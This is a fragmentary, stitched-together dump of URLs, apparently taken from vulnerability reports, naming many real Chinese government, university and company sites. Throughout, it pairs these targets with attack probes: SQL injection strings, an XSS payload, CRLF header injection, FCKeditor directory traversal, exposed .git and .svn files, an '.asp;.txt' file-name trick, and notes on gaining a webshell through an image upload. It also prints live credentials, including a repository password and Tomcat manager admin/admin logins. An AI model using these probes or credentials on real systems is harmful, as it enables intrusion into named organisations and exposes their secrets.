http://public.sxdtdx.edu.cn/jpkc/i.html inurl:jcl_news.asp?id= http://sxhaoyao.com/jcl_news.asp?id=418 http://13xiang.cn/jcl_news.asp?id=369 http://www.sxxfn.com/jcl_news.asp?id=392 http://www.sxkaize.cn/jcl_news.asp?id=71 http://www.sxhxjz.com/jcl_news.asp?id=496 http://211.136.100.30:9090/ http://211.136.100.30:9090/.git/config http://stashpull:po2lf8anyaxlqxmgalk89jh@stash.21cake.com/scm/ic/ic-desktop.git http://stashpull:po2lf8anyaxlqxmgalk89jh@stash.21cake.com/scm/ic/ic-desktop.git url:http://106.39.15.102:80/manager/html user:admin pass:admin http://106.39.15.102/CNR-KJ/ http://www.southsoft.com.cn/ http://***.***.**.*** http://oauth.d.cn/auth/goLogin.html?to=http%3A%2F%2Fwww.d.cn%2F http://shop.lenovo.com.cn/index.html,看到站点非https加密协议的 url:http://120.237.116.74:80/manager/html user:tomcat pass:tomcat url:http://159.226.113.165:80/manager/html user:admin pass:admin http://118.144.81.21:8080/soonet/Http/http_wpublished http://www.gzgslz.jx.cn/luzhengoa/online/listDoc.php?typeId=11 http://www.gzgslz.jx.cn/luzhengoa/online/listDoc.php?searchKey=1 http://www.gzgslz.jx.cn/oa/edit/admin_login.asp http://www.gzgslz.jx.cn/oa/4.asp www.nsccsz.gov.cn http://218.92.71.5:1182/theme/1/Course.aspx?CourseID=1 http://58.54.132.28:8080/theme/1/Course.aspx?CourseID=1 http://119.60.3.156:8097/theme/1/Course.aspx?CourseID=1 http://202.202.111.184/theme/1/Course.aspx?CourseID=5 http://www.mbastudy.cn/theme/1/Course.aspx?CourseID=1 http://110.249.221.93/ http://box.zhangmen.baidu.com/box-jump.html?u=vbscript:Alert%28Document.Domain%29 http://bssyxxgl.eicbs.com/anmai/Asset/Device/currentassetstatright.aspx?useddepart=1&assetname=&assetspec=&assetmodel=&assetfactory=&assetmodeltype=&Lead_date_end=2015-3-9&hidsearch=search http://www.shibei.edu.sh.cn/anmai/Asset/Device/currentassetstatright.aspx?useddepart=1&assetname=1&assetspec=1&assetmodel=2&assetfactory=3&assetmodeltype=1&Lead_date_end=2015-3-9&hidsearch=search http://ps.imau.edu.cn/anmai/Asset/Device/currentassetstatright.aspx?useddepart=1&assetname=1&assetspec=2&assetmodel=3&assetfactory=4&assetmodeltype=&Lead_date_end=2015-3-9&hidsearch=search http://jmzx.xmedu.cn:9999/anmai/Asset/Device/currentassetstatright.aspx?useddepart=1&assetname=1&assetspec=2&assetmodel=3&assetfactory=4&assetmodeltype=&Lead_date_end=2015-3-9&hidsearch=search http://anmai.net:81/Asset/Device/currentassetstatright.aspx?useddepart=1&assetname=1&assetspec=2&assetmodel=3&assetfactory=4&assetmodeltype=&Lead_date_end=2015-3-9&hidsearch=search http://www.powercreator.com.cn/ http://119.60.3.156:8092/Theme/1/OpenDownload.aspx?DownloadID=3 http://202.202.111.184//theme/1/OpenDownload.aspx?DownloadID=1 http://218.92.71.5:1182/theme/1/OpenDownload.aspx?DownloadID=1 http://58.54.132.28:8080/theme/1/OpenDownload.aspx?DownloadID=1 http://www.mbastudy.cn/theme/1/OpenDownload.aspx?DownloadID=1 http://oa.scxxt.com.cn http://202.98.213.134/show_image.aspx?ImageID=@@version http://125.66.128.229/show_image.aspx?ImageID=@@version http://www.rhfcgl.com/show_image.aspx?ImageID=@@version http://58.42.144.172/show_image.aspx?ImageID=@@version http://www.zylzfc.cn/show_image.aspx?ImageID=@@version http://www.dyfgs.com/show_image.aspx?ImageID=@@version http://www.ysfgj.com.cn/show_image.aspx?ImageID=@@version http://222.86.207.241/show_image.aspx?ImageID=@@version http://admin.diantai.ifeng.com/ http://admin.diantai.ifeng.com/.svn/entries http://admin.diantai.ifeng.com:80/test.php http://admin.diantai.ifeng.com/static/js/uploadify/.htaccess http://admin.diantai.ifeng.com//index.php/users http://admin.diantai.ifeng.com///index.php/users/%0d%0a%20SomeCustomInjectedHeader:xxxx123/ http://**.**.**/MPS02/ http://appinterface.symbolmedia.cn/?iid=1 http://116.255.227.78:84/ http://116.255.227.78:84/web.zip http://www.nlrkjsw.gov.cn/cs/index.asp http://www.powercreator.com.cn/ http://***.**.*.** inurl:RESWEB/ResWebResDetaile.aspx http://***.**.**.*:*** http://www.ltpower.net/ http://www2.gdufs.edu.cn/zzxw/exam/ewebeditor/admin_login.asp http://jpk.jxvtc.edu.cn/yxa/exam/ewebeditor/admin_login.asp http://jpkc.guat.edu.cn/xiaoji/mzdgl/test/ewebeditor/admin_login.asp http://jpkc.zzti.edu.cn/C202/test/ewebeditor/admin_login.asp http://210.38.136.69:8006/exam/ewebeditor/admin_login.asp http://www.ltpower.net/ Pamareter:Exercises_Id http://jpkc.nwpu.edu.cn/jp2005/29/exam/Course/Exercises_help.asp?Exercises_Id=23 http://wy.ycu.jx.cn/fyllysj/test/Exercises_help.asp?Exercises_Id=55 http://202.114.196.26:8088/2010jpkc/cljthx/Course/OnLineExam/Course/Exercises_help.asp?Exercises_Id=41 http://210.38.136.69:8006/exam/Exercises_help.asp?Exercises_Id=60 http://jpk.jxvtc.edu.cn/yxa/exam/Exercises_help.asp?Exercises_Id=69 http://www.m6go.com/my/address.do?addressid=380915 id:380915: index.php/login/login http://higo.meilishuo.com http://dealer.bitauto.com/100041947/OrderSubmit/Vote?XCWEBLOG_ID=9d974d351ec64d09839df0f74a3bcd58&ids=300940&vid=69330&__RequestVerificationToken=1 http://113.108.148.4:8090/,并猜测其他地市管理员口令可能同样为弱口令,使用jx-nc/jx-nc成功登录,在系统里发现一FTP信息: ftp://61.143.60.84 http://webservice.tjbtn.net/selfservice/public/login.action http://wapi.hexun.com/Api_newsXml.cc?appId=1&pid=1002347218&pc=20&pn=1 http://open.meilishuo.com Pamareter:Email http://jpkc.guat.edu.cn/xiaoji/mzdgl/test/index.asp http://jpkc.nwpu.edu.cn/jp2005/29/exam/index.asp http://jpkc.wipe.edu.cn/www/jpkc/zq/Exam/Course/index.asp http://wy.ycu.jx.cn/fyllysj/test/index.asp http://jpk.jxvtc.edu.cn/yxa/exam/index.asp http://jgzfjs.seu.edu.cn/vote/votepage.action http://127.0.0.1/躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺.asp;.txt http://cwgl.swu.edu.cn:8080/login.aspx http://www.gtggjy.com/TSPB/cms/zlfile/ZlFileCTRL.do?action=download&zlGuid=F733FAD00EA6FE07348C883F442F3DAB http://www.qfztb.gov.cn/TSPB/cms/zlfile/ZlFileCTRL.do?action=download&zlGuid=F733FAD00EA6FE07348C883F442F3DAB http://www.zjhnztb.com/TSPB/cms/zlfile/ZlFileCTRL.do?action=download&zlGuid=F733FAD00EA6FE07348C883F442F3DAB http://www.jszbw.com/TSPB/cms/zlfile/ZlFileCTRL.do?action=download&zlGuid=F733FAD00EA6FE07348C883F442F3DAB http://www.smztb.com.cn/TSPB/cms/zlfile/ZlFileCTRL.do?action=download&zlGuid=F733FAD00EA6FE07348C883F442F3DAB http://122.226.154.126/TSPB/cms/zlfile/ZlFileCTRL.do?action=download&zlGuid=F733FAD00EA6FE07348C883F442F3DAB http://m.fj.189.cn:80/.svn/entries http://youhui.live.189.cn:80/.svn/entries http://ah.189.cn:80/act/resources/scripts/red/.svn/entries http://yxzcpt.189.cn:80/.svn/entries http://cps.live.189.cn:80/.svn/entries http://waphe.189.cn:80/wap_heb/.svn/entries http://ifree.bj.189.cn/resin-doc/viewfile/?file=index.jsp http://ifree.bj.189.cn/resin-doc/examples/ioc-periodictask/viewfile?file=WEB-INF/web.xml http://cs.gx.189.cn/resin-doc/viewfile/?file=index.jsp http://kzone.zhidao.189.cn/resin-doc/viewfile/?file=index.jsp http://fancy.189.cn/resin-doc/viewfile/?file=index.jsp http://ask.zhidao.189.cn:80/resin-doc/viewfile/?file=index.jsp http://222.82.232.227:9991/bszn!all.action http://xygs.xjaic.gov.cn:7007/login/index.action http://www.e-tiller.com/ch/index.aspx http://***.***.***.cn http://***.***.***.cn/ch/reader/wait_published_articles.aspx http://xuebao.bsu.edu.cn/ch/reader/wait_published_articles.aspx http://www.joconline.com.cn/ch/reader/wait_published_articles.aspx http://www.jbscn.org/swuaqxbcn/ch/reader/wait_published_articles.aspx http://www.shzyyzz.com/shzyyzz/ch/reader/wait_published_articles.aspx http://www.rehabi.com.cn/ch/reader/wait_published_articles.aspx http://www.kayou315.com/manage/main.php http://www.kayou315.com/ckfinder/ckfinder.html?type=Images&CKEditor=content&CKEditorFuncNum=1&langCode=zh-cn http://www.ecs.cn/ http://www.jhyzh.com/OperationManage/ViewSecrecyGuestBookMessage.aspx?sn=test&sp=test&oid=0&type=2 http://www.qzxx.net/OperationManage/ViewSecrecyGuestBookMessage.aspx?sn=test&sp=test&oid=0&type=2 http://www.hbycscjzx.com/OperationManage/ViewSecrecyGuestBookMessage.aspx?sn=test&sp=test&oid=0&type=2 http://www.rzk9.com/OperationManage/ViewSecrecyGuestBookMessage.aspx?sn=test&sp=test&oid=0&type=2 http://www.tysyxx.cn/OperationManage/ViewSecrecyGuestBookMessage.aspx?sn=test&sp=test&oid=0&type=2 https://github.com/zranye/code/blob/e89ba411a8e3060d8e221cf44d118e7de3c09786/lotfilter/bin/lotfilter.properties http://pga.mgh.harvard.edu/cgi-bin/snap3/websnaper3.cgi http://log.yiqi.autodmp.cig.com.cn/ http://log.yiqi.autodmp.cig.com.cn/dealers/get_list_bypager?m_pageindex=1&m_pagesize=10&m_provinceid=330000%09%09%09%09%09%09%09% http://log.yiqi.autodmp.cig.com.cn/lms_api/stat/get_stat_product_list?start_time=20150228%20and%201=1&end_time=20150328 http://log.yiqi.autodmp.cig.com.cn/lms_api/clue/get_clue_list_bypaper?starttime=1425132344&endtime=1427551544&page_index=1&page_size=20&approach=&channel=&carmodel=&meida=&province=&city=&district=&dealer=&cartype=&state=&activity=&keyword=&sortfield=post_time&sort=desc>ype=1&verify_status=&1427551576702 http://jxsi215.oicp.net:59093/mev1/ http://cwc.hunnu.edu.cn/admin/default.aspx http://www.gtggjy.com/TSPB/web/zypt/zypt.jsp?orderid=4&parentid=5D9D029D-B45F-4D71-ADC4-B7830971B5A9 http://www.qfztb.gov.cn/TSPB/web/zypt/zypt.jsp?orderid=4&parentid=5D9D029D-B45F-4D71-ADC4-B7830971B5A9 http://www.zjhnztb.com/TSPB/web/zypt/zypt.jsp?orderid=4&parentid=5D9D029D-B45F-4D71-ADC4-B7830971B5A9 http://www.jszbw.com/TSPB/web/zypt/zypt.jsp?orderid=4&parentid=5D9D029D-B45F-4D71-ADC4-B7830971B5A9 http://www.smztb.com.cn/TSPB/web/zypt/zypt.jsp?orderid=4&parentid=5D9D029D-B45F-4D71-ADC4-B7830971B5A9 http://122.226.154.126/TSPB/web/zypt/zypt.jsp?orderid=4&parentid=5D9D029D-B45F-4D71-ADC4-B7830971B5A9 http://car.51yund.com/mobile/get_all_nopay_order.php http://car.51yund.com/mobile/get_all_pay_order.php http://www.samsoncn.com/ www.*****.com http://www.*****.com http://www.*****.com/Corp/Announcement.aspx http://www.zdxbgxb.com/Corp/Announcement.aspx http://www.zgylxtb.cn/Corp/Announcement.aspx http://jsju.paperonce.org/Corp/Announcement.aspx http://xbskb.ysu.edu.cn/Corp/Announcement.aspx http://www.jwit.org.cn/Corp/Announcement.aspx http://www.aisida.cn/)开发的某套CMS程序。 inurl:qywh.php?id= http://www.wuzhongheg.com/qywh.php?id=12 http://www.csjfilter.com/qywh.php?id=298 http://www.ytpipes.com.cn/qywh.php?id=36 http://www.s5588.com/aboutus/qywh.php?id=2 http://www.kmfunway.cn/qywh.php?id=10 http://www.114dhsc.com/logonAction.action http://210.37.2.181/dlib/homepage/link/link_show.asp?action=list&lang=gb http://202.119.210.5/dlib/homepage/link/link_show.asp?action=list&lang=gb http://202.117.122.44/dlib/homepage/link/link_show.asp?action=list&lang=gb http://202.103.233.136/dlib/homepage/link/link_show.asp?action=list&lang=gb http://211.83.206.52/dlib/homepage/link/link_show.asp?action=list&lang=gb www.jiajiao400.com http://218.78.241.80/anmai/KY_Mamage/Others/Communion_Incept_Right.aspx?depname=a http://jmzx.xmedu.cn:9999/anmai/KY_Mamage/Others/Communion_Incept_Right.aspx?depname=a http://www.gxbyzx.cn:88/anmai/KY_Mamage/Others/Communion_Incept_Right.aspx?depname=a http://oa.w12z.com/anmai/KY_Mamage/Others/Communion_Incept_Right.aspx?depname=a http://www.xwgjzx.com:8888/anmai/KY_Mamage/Others/Communion_Incept_Right.aspx?depname=a http://szxx.pudong-edu.sh.cn/anmai/KY_Mamage/Others/Communion_Incept_Right.aspx?depname=a http://hs.tgbus.com http://218.78.241.80/anmai/KY_Mamage/Integrate_Select/GetAward_Production_particular.aspx?id=1 http://jmzx.xmedu.cn:9999/anmai/KY_Mamage/Integrate_Select/GetAward_Production_particular.aspx?id=1 http://www.gxbyzx.cn:88/anmai/KY_Mamage/Integrate_Select/GetAward_Production_particular.aspx?id=1 http://oa.w12z.com/anmai/KY_Mamage/Integrate_Select/GetAward_Production_particular.aspx?id=1 http://www.xwgjzx.com:8888/anmai/KY_Mamage/Integrate_Select/GetAward_Production_particular.aspx?id=1 http://szxx.pudong-edu.sh.cn/anmai/KY_Mamage/Integrate_Select/GetAward_Production_particular.aspx http://drops.wooyun.org/tips/5136 https://github.com/loveshell/ngx_lua_waf https://github.com/loveshell/ngx_lua_waf/blob/master/init.lua http://bm.huagongjob.net/ http://www.huagongjob.net/searchresult.asp http://www.jianzhuhr.net/ http://www.jianzhuhr.net/searchresult.asp http://www.muqianghr.com/ http://www.muqianghr.com/searchresult.asp http://bm.huagongjob.net/ http://www.jianzhuhr.net/ http://www.muqianghr.com/ http://www.jixiejob.net/index.asp http://qc.jixiejob.net/ http://nffund.com/QueryFundSylServlet?fundcode=160134&date=2014-12-09 http://118.123.15.135/Main/Main.aspx http://118.123.15.23/8080/Login.aspx http://www.flcit.com/Login!showLogin.do http://www.xmxayz.com/Login!showLogin.do http://211.64.205.214/Gmis/Byyxwgl/glllt.aspx http://gs.njfu.edu.cn/Gmis/Byyxwgl/glllt.aspx http://202.206.151.85:8080/Gmis/Byyxwgl/glllt.aspx http://yjs.cdutcm.edu.cn:8080/Gmis/Byyxwgl/glllt.aspx http://graduate.hnust.cn/Gmis/Byyxwgl/glllt.aspx http://202.203.225.17:8080/Gmis/Byyxwgl/glllt.aspx http://218.75.27.177/Gmis/Byyxwgl/glllt.aspx http://yjsy.wmu.edu.cn:8080/Gmis/Byyxwgl/glllt.aspx http://101.76.99.20/Gmis/Byyxwgl/glllt.aspx http://61.187.179.68:8080/Gmis/Byyxwgl/glllt.aspx http://yjsy.wzmc.edu.cn:8080/Gmis/Byyxwgl/glllt.aspx http://210.43.126.80:8080/Gmis/Byyxwgl/glllt.aspx http://211.64.205.214/Gmis/Byyxwgl/glllt.aspx http://www.liangjing.org/qiyejianzhan/Ch/ProductClass-2.html inurl:Chinese/Bs_NewsInfo.asp?Action=Co&id= http://www.jat-cva.com.cn/Chinese/Bs_ProductShow.asp?ArticleID=150 http://www.sunshinepaperbox.com/Chinese/Bs_ProductShow.asp?ArticleID=225 http://www.bjiee.com.cn/newweb/chinese/Bs_ProductShow.asp?ArticleID=133 http://www.hrpackage.com.cn/Chinese/Bs_ProductShow.asp?ArticleID=215 http://www.taishantyre.com/Chinese/Bs_ProductShow.asp?ArticleID=183 http://www.napacoustics.com.hk/Chinese/Bs_ProductShow.asp?ArticleID=106 http://www.pandaintl.com.cn/cn/Bs_ProductShow.asp?ArticleID=579 http://www.jianhuyi.com/Chinese/Bs_ProductShow.asp?ArticleID=121 http://www.caltexoils.cn/Chinese/Bs_ProductShow.asp?ArticleID=118 http://www.watsin.com.cn/Chinese/Bs_ProductShow.asp?ArticleID=168 http://www.wishfuloptical.com/Chinese/Bs_ProductShow.asp?ArticleID=219 http://www.bo-power.com/chinese/Bs_ProductShow.asp?ArticleID=365 http://test.sinouk.org.uk/Chinese/Bs_ProductShow.asp?ArticleID=121 http://www.3variables.sg/Chinese/Bs_ProductShow.asp?ArticleID=57 http://www.cdrich.cn/cn/Bs_ProductShow.asp?ArticleID=80 http://www.yunyangqx.com/chinese/Bs_ProductShow.asp?ArticleID=410 http://www.zpaec.com/Chinese/Bs_ProductShow.asp?ArticleID=151 http://www.maing-yion.com.tw/Chinese/Bs_ProductShow.asp?ArticleID=123 http://www.ludingtools.com/Chinese/Bs_ProductShow.asp?ArticleID=270 http://www.hbhxdl.net/chinese/Bs_ProductShow.asp?ArticleID=510 http://www.shuangfeng-china.com/cn/Bs_Product.asp?BigClassName=%C6%FB%B3%B5%D6%D0%C0%E4%C6%F7 http://www.jat-cva.com.cn/Chinese/Bs_Product.asp?BigClassName=%BB%AF%B9%A4%C9%FA%B2%FA%C9%E8%B1%B8 http://www.sunshinepaperbox.com/Chinese/Bs_Product.asp?BigClassName=%BB%AF%D7%B0%CA%D7%CA%CE%BA%D0 http://www.bjiee.com.cn/newweb/chinese/Bs_Product.asp?BigClassName=%C4%E0%BD%AC%B2%C4%C1%CF http://www.hrpackage.com.cn/Chinese/Bs_Product.asp?BigClassName=%C6%FB%B3%B5%D3%C3%C6%B7%B0%FC%D7%B0 http://www.taishantyre.com/Chinese/Bs_Product.asp?BigClassName=%D4%D8%D6%D8%C6%FB%B3%B5%A1%A2%B4%F3%BF%CD%B3%B5%C2%D6%CC%A5 http://www.napacoustics.com.hk/Chinese/Bs_Product.asp?BigClassName=NAP%CF%FB%C9%F9%C6%F7%CF%B5%C1%D0 http://www.pandaintl.com.cn/cn/Bs_Product.asp?BigClassName=%D2%BA%BE%A7%B5%E7%CA%D3 http://www.jianhuyi.com/Chinese/Bs_Product.asp?BigClassName=%BC%E0%BB%A4%D2%C7OEM%C4%A3%BF%E9 http://www.caltexoils.cn/Chinese/Bs_Product.asp?BigClassName=%BC%D3%B5%C2%CA%BF%C6%FB%BB%FA%D3%CD http://www.watsin.com.cn/Chinese/Bs_Product.asp?BigClassName=%BD%F0%D2%F2%EB%C4 http://www.wishfuloptical.com/Chinese/Bs_Product.asp?BigClassName=CR39%20Resin%20Lens http://www.bo-power.com/chinese/Bs_Product.asp?BigClassName=EʮH http://test.sinouk.org.uk/Chinese/Bs_Product.asp?BigClassName=BSCE%20Activities http://www.3variables.sg/Chinese/Bs_Product.asp?BigClassName=%CA%B1%B3%BD%D1%D5%C9%AB%B6%A8%CE%BB%D6%D3 http://www.cdrich.cn/cn/Bs_Product.asp?BigClassName=%C9%E8%20%B1%B8%20%D6%C6%20%D4%EC http://www.yunyangqx.com/chinese/Bs_Product.asp?BigClassName=%B2%FA%BF%C6%C6%F7%D0%B5 http://www.zpaec.com/Chinese/Bs_Product.asp?BigClassName=%C8%ED%BC%FE%CA%E9%BC%AE http://www.ludingtools.com/Chinese/Bs_Product.asp?BigClassName=%D6%E9%B1%A6%B9%A4%BE%DF http://www.hbhxdl.net/chinese/Bs_Product.asp?BigClassName=%BB%EE%C3%C5 http://www.jat-cva.com.cn/Chinese/Bs_NewsInfo.asp?Action=Co&id=97 http://www.bjiee.com.cn/newweb/chinese/Bs_NewsInfo.asp?Action=Co&id=141 http://www.hrpackage.com.cn/Chinese/Bs_NewsInfo.asp?Action=Co&id=89 http://www.taishantyre.com/Chinese/Bs_NewsInfo.asp?Action=Co&id=319 http://www.napacoustics.com.hk/Chinese/Bs_NewsInfo.asp?Action=Co&id=87 http://www.pandaintl.com.cn/cn/Bs_NewsInfo.asp?Action=Co&id=95 http://www.jianhuyi.com/Chinese/Bs_NewsInfo.asp?Action=Co&id=85 http://www.caltexoils.cn/Chinese/Bs_NewsInfo.asp?Action=Co&id=103 http://www.watsin.com.cn/chinese/Bs_NewsInfo.asp?Action=Co&id=159 http://test.sinouk.org.uk/Chinese/Bs_NewsInfo.asp?Action=Co&id=117 http://www.3variables.sg/Chinese/Bs_NewsInfo.asp?Action=Co&id=149 http://www.cdrich.cn/cn/Bs_NewsInfo.asp?Action=Co&id=21 http://www.yunyangqx.com/chinese/Bs_NewsInfo.asp?Action=Co&id=99 http://www.maing-yion.com.tw/Chinese/Bs_NewsInfo.asp?Action=Co&id=90 http://www.zenchant.com/Bs_NewsInfo.asp?Action=Co&id=31 http://www.zhihefrp.com/Chinese/Bs_NewsInfo.asp?Action=Co&id=114 http://www.yantaicherry.com/cn/bs_newsinfo.asp?action=Ye&id=19 http://www.fumingwei.com/chinese/Bs_NewsInfo.asp?Action=Co&id=28 http://www.xmmrcs.com/chinese/Bs_NewsInfo.asp?Action=Co&id=761 http://www.zpaec.com/Chinese/Bs_NewsInfo.asp?Action=Ye&id=76 http://www.jat-cva.com.cn/Chinese/Bs_FaqInfo.asp?id=73 http://www.napacoustics.com.hk/chinese/Bs_FaqInfo.asp?id=2 http://www.88831535.com/Chinese/Bs_FaqInfo.asp?id=70 http://www.taishantyre.com/Chinese/Bs_FaqInfo.asp?id=72 http://www.cdrich.cn/cn/Bs_FaqInfo.asp?id=4 http://www.auhuaceramics.com/auhua/Chinese/Bs_FaqInfo.asp?id=70 http://www.fumingwei.com/Chinese/Bs_FaqInfo.asp?id=1 http://www.3variables.sg/Chinese/Bs_FaqInfo.asp?id=15 http://www.xmmrcs.com/Chinese/Bs_FaqInfo.asp?id=119 http://www.djgyl.com/chinese/Bs_FaqInfo.asp?id=71 http://www.ludi8.com/Chinese/Bs_FaqInfo.asp?id=85 http://www.zgxhnyfw.com/Chinese/Bs_FaqInfo.asp?ID=146 http://www.lnxhnyfw.com/Chinese/Bs_FaqInfo.asp?ID=132 http://www.patangye.com.cn/patangye/patangye/chinese/Bs_FaqInfo.asp?id=76 http://www.ahxhnyfw.com/Chinese/Bs_FaqInfo.asp?ID=117 http://www.hnxhnyfw.com/Chinese/Bs_FaqInfo.asp?ID=92 http://www.jsxhnyfw.com/Chinese/Bs_FaqInfo.asp?ID=114 http://jws.wjtvu.cn/chinese/Bs_FaqInfo.asp?id=2 http://www.winkingled.com/cn/Bs_FaqInfo.asp?id=1 http://www.cxfz.cn/cx/cx/chinese/Bs_FaqInfo.asp?id=71 http://www.dvd168.cn/Chinese/Bs_FaqInfo.asp?id=92 http://www.guanjian365.net/chinese/Bs_FaqInfo.asp?id=86 http://www.xwbg.cn/xw/main/Bs_FaqInfo.asp?id=71 http://www.caltexoils.cn/Chinese/Bs_FaqInfo.asp?id=70 http://blogadmin.ci123.com/blogs/config/ http://www.rzfwzx.gov.cn/workplate/base/person/listbyorgsel.aspx http://www.bdxzfw.cn/workplate/base/person/listbyorgsel.aspx http://www.cxxzfwzx.com/workplate/base/person/listbyorgsel.aspx http://wxxz.gov.cn/workplate/base/person/listbyorgsel.aspx http://www.hdxzwzx.com/workplate/base/person/listbyorgsel.aspx http://xz.njqsp.com:8001/workplate/base/person/listbyorgsel.aspx http://211.142.37.152:81/workplate/base/person/listbyorgsel.aspx http://211.142.37.152:88/workplate/base/person/listbyorgsel.aspx http://211.142.37.154:83/workplate/base/person/listbyorgsel.aspx http://211.142.37.152:83/workplate/base/person/listbyorgsel.aspx http://183.203.128.238:82/workplate/base/person/listbyorgsel.aspx http://211.142.41.114:82/workplate/base/person/listbyorgsel.aspx http://www.hbsxxzfwzx.gov.cn/workplate/base/person/listbyorgsel.aspx http://www.lzxzfwzx.com/workplate/base/person/listbyorgsel.aspx http://www.axxzfwzx.com/workplate/base/person/listbyorgsel.aspx http://gyxzfw.net/workplate/base/person/listbyorgsel.aspx http://60.220.253.153:81/workplate/base/person/listbyorgsel.aspx http://60.220.240.7/workplate/base/person/listbyorgsel.aspx http://211.142.37.152:85/workplate/base/person/listbyorgsel.aspx www.qxxzfwzx.com/workplate/base/person/listbyorgsel.aspx http://xz.njqsp.com:8001/workplate/base/person/listbyorgsel.aspx http://211.142.37.152:82/workplate/base/person/listbyorgsel.aspx http://www.rzfwzx.gov.cn/workplate/base/person/listbyorgsel.aspx为例: www.rzfwzx.gov.cn http://www.rzfwzx.gov.cn http://gj.517na.com/ http://th.517na.com/ http://gq.517na.com/ http://user.517na.com/ http://jd.517na.com/ http://yc.517na.com/ http://jqw.com/admin/left.aspx http://tieba.baidu.com/p/2922920532?qq-pf-to=pcqq.group www.erya100.com http://wap.17k.com/user/regist.aspx http://wap.17k.com/wread/default.aspx inurl:ProductListCategory.aspx http://www.nongyou.com.cn/ http://61.133.119.187:8091//Default.aspx http://222.135.76.147:8200//Default.aspx http://222.135.127.190:7200//Default.aspx http://221.2.149.47:8200/Default.aspx http://218.59.205.41:8053/Default.aspx http://jwh.tanljgzx.gov.cn/Default.aspx http://60.217.72.17:7048/Default.aspx http://211.68.208.72/gmis_tjwgy/Byyxwgl/dbwyhlist.aspx http://gs.njfu.edu.cn/Gmis/Byyxwgl/dbwyhlist.aspx http://202.206.151.85:8080/Gmis/Byyxwgl/dbwyhlist.aspx http://yjs.cdutcm.edu.cn:8080/Gmis/Byyxwgl/dbwyhlist.aspx http://graduate.hnust.cn/Gmis/Byyxwgl/dbwyhlist.aspx http://202.203.225.17:8080/Gmis/Byyxwgl/dbwyhlist.aspx http://218.75.27.177/Gmis/Byyxwgl/dbwyhlist.aspx http://yjsy.wmu.edu.cn:8080/Gmis/Byyxwgl/dbwyhlist.aspx http://101.76.99.20/Gmis/Byyxwgl/dbwyhlist.aspx http://61.187.179.68:8080/Gmis/Byyxwgl/dbwyhlist.aspx http://yjsy.wzmc.edu.cn:8080/Gmis/Byyxwgl/dbwyhlist.aspx http://210.43.126.80:8080/Gmis/Byyxwgl/dbwyhlist.aspx http://211.64.205.214/Gmis/Byyxwgl/dbwyhlist.aspx http://t.admin.ccb.dingzhiweixin.com/main/ http://210.41.225.91:96/login.aspx http://www.xm120.net/120news/ http://www.xmcdc.com.cn/cdcnews/ http://www.smwsjd.com/smwsjd/ http://www.hlwsjd.com/hlnews/ http://www.xmwsjd.com/wsjd/ http://www.xm120.net/120news//FCKeditor/_samples/default.html http://www.xm120.net//120news/UserFiles/Image/1.jsp http://www.xm120.net/120news/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../../../ http://www.xm120.net/120news/admin/user_add.jsp http://www.xm120.net/120news/admin/login.jsp http://*/*/cd/right_right.jsp中给刚才新增的帐号赋权限,其实我们利用的就是一个登录的session, http://*/*/cd/file_list.jsp http://*/*/news/news_list.jsp http://*/*/cd/right_right.jsp http://www.hlwsjd.com/hlnews//FCKeditor/_samples/default.html http://www.hlwsjd.com/hlnews/admin/user_add.jsp http://www.hlwsjd.com/hlnews/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../ http://www.hlwsjd.com/hlnews/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../ http://www.xmcdc.com.cn/cdcnews/FCKeditor/_samples/default.html http://www.xmcdc.com.cn/cdcnews//FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../../../ http://www.csqiandu.com/ http://e.fangdd.com/ http://china35.com/ http://superman.tgbus.com/login.shtml http://www.ffan.com www.ffan.com http://zjy.gdcost.com/ http://zjy.gdcost.com/uploadImg_slt/2015-03/bbed6195-ad6f-4b21-b406-3145a6f1c5a2.jpg。然后把图片下载下来,用老外的jpgshell进行处理。然后再burp改包上传即可getshell http://zjy.gdcost.com/uploadImg_slt/2015-03/037fdb58-0af8-4cb9-8479-d0499c80a687.asp http://cmis.pkuschool.edu.cn/qasss/login.jsp http://cmis.rdfz.cn/qasss/login.jsp http://117.117.98.2/qasss/login.jsp http://cmis.cnuschool.org.cn http://58.129.16.19/qasss/login.jsp http://58.133.218.8/qasss/login.jsp http://58.133.169.200/qasss/login.jsp http://58.133.216.10/qasss/login.jsp http://58.129.42.1/qasss/login.jsp http://61.50.229.140/qasss/login.jsp http://58.119.188.22/qasss/DownloadAttachAction.a?attachid=4242 http://piao.ffan.com/good_list?mechant=2072413 soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/ xmlns:rec="http://receive.blf.jcms soapenv:Header/ soapenv:Body rec:wsSyncGetInfos soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/ xsi:type="xsd:string xsi:type="xsd:string xsi:type="xsd:string xsi:type="xsd:string xsi:type="xsd:string rec:wsSyncGetInfos soapenv:Body soapenv:Envelope www.hzgjj.gov.cn http://180.153.28.152:8081/Portals/NoticeShowDetail.aspx?tid=35 http://gh.cmge.com/guild/desc/id/116?searchkey=1 http://sqlmap.org http://shixi.189.cn/shixibao/cp.php?ac=enterprise_job&ig http://sqlmap.org http://tclcomm.com/service/serinter.asp?type=%BD%BB%BB%BB%BB%FA http://tclcomm.com/service/sernet1.asp?id=%E7%94%98%E8%82%83 http://tclcomm.com/purchase/info.asp?typeid=5 http://tclcomm.com/product/lefttop.asp?LanmuID=137&Pid=845&TypeID=12 http://tclcomm.com/zhaopin/zhaopin_detail.asp?zpid=152 http://tclcomm.com/news/newssearch.asp 